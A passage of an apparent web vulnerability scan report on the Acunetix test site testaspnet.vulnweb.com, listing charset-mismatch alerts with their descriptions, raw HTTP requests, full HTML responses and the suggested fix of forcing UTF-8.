          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Force UTF-8 for all text content in both the HTTP header and meta tags in HTML or encoding declarations in XML.

        3. GET http://testaspnet.vulnweb.com/default.aspx
          Alert description

          This check identifies responses where the HTTP Content-Type header declares a charset different from the charset defined by the body of the HTML or XML. When there is a charset mismatch between the HTTP header and the content body, web browsers can be forced into an undesirable content-sniffing mode to determine the content's correct character set.

          An attacker could manipulate content on the page to be interpreted in an encoding of their choice. For example, if an attacker can control content at the beginning of the page, they could inject script using UTF-7 encoded text and manipulate some browsers into interpreting that text.

          Other info

          There was a charset mismatch between the HTTP Header and the META content-type encoding declarations: [utf-8] and [windows-1252] do not match.

          Request
          Request line and header section (316 bytes)
          GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Force UTF-8 for all text content in both the HTTP header and meta tags in HTML or encoding declarations in XML.

        4. POST http://testaspnet.vulnweb.com/default.aspx
          Alert description

          This check identifies responses where the HTTP Content-Type header declares a charset different from the charset defined by the body of the HTML or XML. When there is a charset mismatch between the HTTP header and the content body, web browsers can be forced into an undesirable content-sniffing mode to determine the content's correct character set.

          An attacker could manipulate content on the page to be interpreted in an encoding of their choice. For example, if an attacker can control content at the beginning of the page, they could inject script using UTF-7 encoded text and manipulate some browsers into interpreting that text.

          Other info

          There was a charset mismatch between the HTTP Header and the META content-type encoding declarations: [utf-8] and [windows-1252] do not match.

          Request
          Request line and header section (388 bytes)
          POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com
          Content-Length: 1025
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1025 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8DK3Y7%2FBz6vaeG4S8AOaGVC7NUiA%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 12371
          
          
          Response body (12371 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
